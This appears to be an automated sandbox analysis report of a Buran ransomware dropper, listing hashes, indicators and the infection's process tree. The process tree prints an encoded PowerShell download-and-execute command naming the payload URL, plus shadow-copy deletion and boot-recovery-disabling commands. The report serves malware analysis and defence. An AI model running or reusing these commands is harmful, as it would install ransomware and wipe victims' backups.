Analysis
-
max time kernel
129s -
max time network
145s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
31/08/2021, 16:41
Static task
static1
Behavioral task
behavioral1
Sample
6440.js
Resource
win7v20210410
Behavioral task
behavioral2
Sample
6440.js
Resource
win10v20210408
General
-
Target
6440.js
-
Size
541KB
-
MD5
268848cb4ff95f5b95a8c619b626eb1e
-
SHA1
1ba3890f085853d01475ddf9fa3d991dee706be6
-
SHA256
f827fc739c432960cabffffa30111ac512e019928c22ce6f55efca587bdb75bf
-
SHA512
07cfd18fa8ec70db0a1c0f061ee5c6951979bada17777dd30cc473ee0cb161882109920a8d46ca961d4626231d94b4bac85a52180c34ae90442d16d70192781c
Malware Config
Extracted
https://jolantagraban.pl/log/57843441668980/dll/assistant.php
Extracted
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
buran
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 13 3056 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 1416 CWPpV.exe 3104 TrustedInstaller.exe 4516 TrustedInstaller.exe -
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File opened for modification C:\Users\Admin\Pictures\ClearMeasure.tiff TrustedInstaller.exe File opened for modification C:\Users\Admin\Pictures\CompressCheckpoint.tiff TrustedInstaller.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run CWPpV.exe Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\TrustedInstaller.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\TrustedInstaller.exe\" -start" CWPpV.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: TrustedInstaller.exe File opened (read-only) \??\N: TrustedInstaller.exe File opened (read-only) \??\J: TrustedInstaller.exe File opened (read-only) \??\I: TrustedInstaller.exe File opened (read-only) \??\H: TrustedInstaller.exe File opened (read-only) \??\F: TrustedInstaller.exe File opened (read-only) \??\V: TrustedInstaller.exe File opened (read-only) \??\T: TrustedInstaller.exe File opened (read-only) \??\R: TrustedInstaller.exe File opened (read-only) \??\K: TrustedInstaller.exe File opened (read-only) \??\G: TrustedInstaller.exe File opened (read-only) \??\B: TrustedInstaller.exe File opened (read-only) \??\W: TrustedInstaller.exe File opened (read-only) \??\P: TrustedInstaller.exe File opened (read-only) \??\L: TrustedInstaller.exe File opened (read-only) \??\E: TrustedInstaller.exe File opened (read-only) \??\A: TrustedInstaller.exe File opened (read-only) \??\Z: TrustedInstaller.exe File opened (read-only) \??\Y: TrustedInstaller.exe File opened (read-only) \??\X: TrustedInstaller.exe File opened (read-only) \??\U: TrustedInstaller.exe File opened (read-only) \??\S: TrustedInstaller.exe File opened (read-only) \??\Q: TrustedInstaller.exe File opened (read-only) \??\M: TrustedInstaller.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 geoiptool.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_joined.gif.kd8eby0.752-02C-F46 TrustedInstaller.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\ui-strings.js TrustedInstaller.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiBold.ttf TrustedInstaller.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar.kd8eby0.752-02C-F46 TrustedInstaller.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-ul-phn.xrm-ms.kd8eby0.752-02C-F46 TrustedInstaller.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_Subscription-ppd.xrm-ms.kd8eby0.752-02C-F46 TrustedInstaller.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PAPYRUS\PAPYRUS.INF.kd8eby0.752-02C-F46 TrustedInstaller.exe File opened for modification C:\Program Files\Microsoft Office\root\vreg\excel.x-none.msi.16.x-none.vreg.dat.kd8eby0.752-02C-F46 TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarLargeTile.scale-150.png TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugin.js TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\AppStore_icon.svg TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe\Assets\LargeLogo.scale-200.png TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\ui-strings.js TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\close.svg TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sk-sk\ui-strings.js TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\IA32.api.kd8eby0.752-02C-F46 TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\illustrations.png TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\ui-strings.js TrustedInstaller.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt TrustedInstaller.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11701.1001.87.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\SplashScreen.scale-100.png TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\Tab\TabMaster.png TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionGroupSmallTile.scale-125.png TrustedInstaller.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] TrustedInstaller.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ENES\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\LTR\contrast-white\LargeTile.scale-200.png TrustedInstaller.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\cs-cz\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT TrustedInstaller.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sk-sk\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\da-dk\ui-strings.js.kd8eby0.752-02C-F46 TrustedInstaller.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\GostName.XSL TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Square310x310Logo.scale-100.png TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\sleepy.png TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.targetsize-40_contrast-white.png TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\compare.png TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-36_altform-fullcolor.png TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js.kd8eby0.752-02C-F46 TrustedInstaller.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\ij.kd8eby0.752-02C-F46 TrustedInstaller.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\psfontj2d.properties TrustedInstaller.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\snmp.acl.template TrustedInstaller.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\40.jpg TrustedInstaller.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraLargeTile.contrast-white_scale-100.png TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_Full.aapp TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\ui-strings.js TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-24.png TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-dark-disabled_32.svg TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\illustrations.png.kd8eby0.752-02C-F46 TrustedInstaller.exe File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.contrast-black_scale-200.png TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x64__8wekyb3d8bbwe\logo.png TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\office.odf TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\sk_60x42.png TrustedInstaller.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css TrustedInstaller.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT TrustedInstaller.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\DEEPBLUE\DEEPBLUE.ELM TrustedInstaller.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-20_contrast-high.png TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\ui-strings.js.kd8eby0.752-02C-F46 TrustedInstaller.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] TrustedInstaller.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\feature.xml TrustedInstaller.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\core_visualvm.jar.kd8eby0.752-02C-F46 TrustedInstaller.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-application.jar TrustedInstaller.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-oob.xrm-ms.kd8eby0.752-02C-F46 TrustedInstaller.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT TrustedInstaller.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 3696 vssadmin.exe 4740 vssadmin.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e CWPpV.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 CWPpV.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 3056 powershell.exe 3056 powershell.exe 3056 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3056 powershell.exe Token: SeDebugPrivilege 1416 CWPpV.exe Token: SeDebugPrivilege 1416 CWPpV.exe Token: SeIncreaseQuotaPrivilege 4736 WMIC.exe Token: SeSecurityPrivilege 4736 WMIC.exe Token: SeTakeOwnershipPrivilege 4736 WMIC.exe Token: SeLoadDriverPrivilege 4736 WMIC.exe Token: SeSystemProfilePrivilege 4736 WMIC.exe Token: SeSystemtimePrivilege 4736 WMIC.exe Token: SeProfSingleProcessPrivilege 4736 WMIC.exe Token: SeIncBasePriorityPrivilege 4736 WMIC.exe Token: SeCreatePagefilePrivilege 4736 WMIC.exe Token: SeBackupPrivilege 4736 WMIC.exe Token: SeRestorePrivilege 4736 WMIC.exe Token: SeShutdownPrivilege 4736 WMIC.exe Token: SeDebugPrivilege 4736 WMIC.exe Token: SeSystemEnvironmentPrivilege 4736 WMIC.exe Token: SeRemoteShutdownPrivilege 4736 WMIC.exe Token: SeUndockPrivilege 4736 WMIC.exe Token: SeManageVolumePrivilege 4736 WMIC.exe Token: 33 4736 WMIC.exe Token: 34 4736 WMIC.exe Token: 35 4736 WMIC.exe Token: 36 4736 WMIC.exe Token: SeIncreaseQuotaPrivilege 3336 WMIC.exe Token: SeSecurityPrivilege 3336 WMIC.exe Token: SeTakeOwnershipPrivilege 3336 WMIC.exe Token: SeLoadDriverPrivilege 3336 WMIC.exe Token: SeSystemProfilePrivilege 3336 WMIC.exe Token: SeSystemtimePrivilege 3336 WMIC.exe Token: SeProfSingleProcessPrivilege 3336 WMIC.exe Token: SeIncBasePriorityPrivilege 3336 WMIC.exe Token: SeCreatePagefilePrivilege 3336 WMIC.exe Token: SeBackupPrivilege 3336 WMIC.exe Token: SeRestorePrivilege 3336 WMIC.exe Token: SeShutdownPrivilege 3336 WMIC.exe Token: SeDebugPrivilege 3336 WMIC.exe Token: SeSystemEnvironmentPrivilege 3336 WMIC.exe Token: SeRemoteShutdownPrivilege 3336 WMIC.exe Token: SeUndockPrivilege 3336 WMIC.exe Token: SeManageVolumePrivilege 3336 WMIC.exe Token: 33 3336 WMIC.exe Token: 34 3336 WMIC.exe Token: 35 3336 WMIC.exe Token: 36 3336 WMIC.exe Token: SeBackupPrivilege 2760 vssvc.exe Token: SeRestorePrivilege 2760 vssvc.exe Token: SeAuditPrivilege 2760 vssvc.exe Token: SeIncreaseQuotaPrivilege 3336 WMIC.exe Token: SeIncreaseQuotaPrivilege 4736 WMIC.exe Token: SeSecurityPrivilege 3336 WMIC.exe Token: SeSecurityPrivilege 4736 WMIC.exe Token: SeTakeOwnershipPrivilege 3336 WMIC.exe Token: SeTakeOwnershipPrivilege 4736 WMIC.exe Token: SeLoadDriverPrivilege 3336 WMIC.exe Token: SeLoadDriverPrivilege 4736 WMIC.exe Token: SeSystemProfilePrivilege 3336 WMIC.exe Token: SeSystemProfilePrivilege 4736 WMIC.exe Token: SeSystemtimePrivilege 3336 WMIC.exe Token: SeSystemtimePrivilege 4736 WMIC.exe Token: SeProfSingleProcessPrivilege 3336 WMIC.exe Token: SeProfSingleProcessPrivilege 4736 WMIC.exe Token: SeIncBasePriorityPrivilege 3336 WMIC.exe Token: SeIncBasePriorityPrivilege 4736 WMIC.exe -
Suspicious use of WriteProcessMemory 55 IoCs
description pid Process procid_target PID 4796 wrote to memory of 4180 4796 wscript.exe 77 PID 4796 wrote to memory of 4180 4796 wscript.exe 77 PID 4180 wrote to memory of 3056 4180 cmd.exe 79 PID 4180 wrote to memory of 3056 4180 cmd.exe 79 PID 3056 wrote to memory of 1416 3056 powershell.exe 80 PID 3056 wrote to memory of 1416 3056 powershell.exe 80 PID 3056 wrote to memory of 1416 3056 powershell.exe 80 PID 1416 wrote to memory of 3104 1416 CWPpV.exe 82 PID 1416 wrote to memory of 3104 1416 CWPpV.exe 82 PID 1416 wrote to memory of 3104 1416 CWPpV.exe 82 PID 1416 wrote to memory of 2740 1416 CWPpV.exe 83 PID 1416 wrote to memory of 2740 1416 CWPpV.exe 83 PID 1416 wrote to memory of 2740 1416 CWPpV.exe 83 PID 1416 wrote to memory of 2740 1416 CWPpV.exe 83 PID 1416 wrote to memory of 2740 1416 CWPpV.exe 83 PID 1416 wrote to memory of 2740 1416 CWPpV.exe 83 PID 3104 wrote to memory of 3160 3104 TrustedInstaller.exe 84 PID 3104 wrote to memory of 3160 3104 TrustedInstaller.exe 84 PID 3104 wrote to memory of 3160 3104 TrustedInstaller.exe 84 PID 3104 wrote to memory of 4480 3104 TrustedInstaller.exe 85 PID 3104 wrote to memory of 4480 3104 TrustedInstaller.exe 85 PID 3104 wrote to memory of 4480 3104 TrustedInstaller.exe 85 PID 3104 wrote to memory of 3460 3104 TrustedInstaller.exe 86 PID 3104 wrote to memory of 3460 3104 TrustedInstaller.exe 86 PID 3104 wrote to memory of 3460 3104 TrustedInstaller.exe 86 PID 3104 wrote to memory of 4336 3104 TrustedInstaller.exe 87 PID 3104 wrote to memory of 4336 3104 TrustedInstaller.exe 87 PID 3104 wrote to memory of 4336 3104 TrustedInstaller.exe 87 PID 3104 wrote to memory of 4332 3104 TrustedInstaller.exe 96 PID 3104 wrote to memory of 4332 3104 TrustedInstaller.exe 96 PID 3104 wrote to memory of 4332 3104 TrustedInstaller.exe 96 PID 3104 wrote to memory of 4564 3104 TrustedInstaller.exe 95 PID 3104 wrote to memory of 4564 3104 TrustedInstaller.exe 95 PID 3104 wrote to memory of 4564 3104 TrustedInstaller.exe 95 PID 3104 wrote to memory of 4516 3104 TrustedInstaller.exe 94 PID 3104 wrote to memory of 4516 3104 TrustedInstaller.exe 94 PID 3104 wrote to memory of 4516 3104 TrustedInstaller.exe 94 PID 4332 wrote to memory of 4740 4332 cmd.exe 98 PID 4332 wrote to memory of 4740 4332 cmd.exe 98 PID 4332 wrote to memory of 4740 4332 cmd.exe 98 PID 3160 wrote to memory of 4736 3160 cmd.exe 97 PID 3160 wrote to memory of 4736 3160 cmd.exe 97 PID 3160 wrote to memory of 4736 3160 cmd.exe 97 PID 4564 wrote to memory of 3336 4564 cmd.exe 100 PID 4564 wrote to memory of 3336 4564 cmd.exe 100 PID 4564 wrote to memory of 3336 4564 cmd.exe 100 PID 4564 wrote to memory of 3696 4564 cmd.exe 102 PID 4564 wrote to memory of 3696 4564 cmd.exe 102 PID 4564 wrote to memory of 3696 4564 cmd.exe 102 PID 3104 wrote to memory of 4224 3104 TrustedInstaller.exe 104 PID 3104 wrote to memory of 4224 3104 TrustedInstaller.exe 104 PID 3104 wrote to memory of 4224 3104 TrustedInstaller.exe 104 PID 3104 wrote to memory of 4224 3104 TrustedInstaller.exe 104 PID 3104 wrote to memory of 4224 3104 TrustedInstaller.exe 104 PID 3104 wrote to memory of 4224 3104 TrustedInstaller.exe 104
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\6440.js1⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==2⤵
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBqAG8AbABhAG4AdABhAGcAcgBhAGIAYQBuAC4AcABsAC8AbABvAGcALwA1ADcAOAA0ADMANAA0ADEANgA2ADgAOQA4ADAALwBkAGwAbAAvAGEAcwBzAGkAcwB0AGEAbgB0AC4AcABoAHAAIgApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Users\Admin\AppData\Local\Temp\CWPpV.exe"C:\Users\Admin\AppData\Local\Temp\CWPpV.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -start5⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:3104 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete6⤵
- Suspicious use of WriteProcessMemory
PID:3160 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete7⤵
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no6⤵PID:4480
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures6⤵PID:3460
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet6⤵PID:4336
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\TrustedInstaller.exe" -agent 06⤵
- Executes dropped EXE
- Modifies extensions of user files
- Drops file in Program Files directory
- Drops file in Windows directory
PID:4516
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat6⤵
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3336
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet7⤵
- Interacts with shadow copies
PID:3696
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet6⤵
- Suspicious use of WriteProcessMemory
PID:4332 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet7⤵
- Interacts with shadow copies
PID:4740
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe6⤵PID:4224
-
-
-
